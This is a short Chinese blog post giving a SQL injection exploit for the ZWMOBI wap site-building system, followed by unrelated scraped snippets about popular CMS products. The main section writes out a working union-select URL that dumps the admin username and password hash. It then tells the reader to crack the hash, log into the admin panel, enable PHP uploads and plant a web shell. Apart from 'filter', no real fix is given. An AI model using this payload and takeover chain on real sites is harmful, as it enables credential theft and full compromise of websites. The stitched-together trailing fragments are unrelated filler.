ZWMOBI wap建站系統注入及修復

2022-09-24 00:42:08 字數 376 閱讀 9037

0day說明:變數過濾不嚴,導致mysql注入發生。

漏洞利用:zwmobi.php?zwmobi=bbsview&v=21&cid=12/**/union/**/select/**/1,1,1,1,username,password,1,1,1,1/**/from/**/表字首_member/**/where/**/uid=1

其中uid就是使用者的uid,因為預設管理uid是1.表字首請替換為實際的表字首,預設是zwmobi,可以通過在 cid=12後面加乙個單引號爆出。  

修復:過濾

官方補丁:尚未發布

爆出來的md5密碼拿去破解,破解了在 admin_index.php登入,在後台配置的地方加個php型別的上傳。然後點系統模組,軟體管理,新增軟體,傳馬

闊論建站系統

如今現成的建站系統大量湧現在我們站長面前,讓我們都不知道選擇哪個好了,當然幾個比較有名氣的系統我自己都嘗試過。下面我給大家分惜一下幾個主要cpprul 的系統。dede 眾人之選 如今這個系統好像已經成為建站系統的主流了,都在改用這個 比如現在程式設計客棧的 站長網 admin5.com 站長站 c...

PHP常用的建站系統

1.dedecms 織夢cms 織夢cms是集簡單 健壯 靈活 開源幾大特點的開源內容管理系統,是國內開源cms的領先品牌,目前程式安裝量已達七十萬,超過六成的站點正在使用織夢cms。2.phpcms 3.wordpress wordpress是一款免費的開源部落格程式,功能強大,外掛程式眾多,易於...

PHPcms建站系統 個人建站必不可少的工具

cms系統已經成為個人站長建站過程中必不可少的工具,現在已經基本看不到多少站長還在靠手工寫html頁面,究其原因無非是因為cms具有使用簡單,維護方便等眾多優點。cms的發展也帶來了個人 的長足發展!各色各樣的 使網路世界更加豐富精彩。今天來簡單介紹幾個主流的cms以及其代表 php中的主流cms ...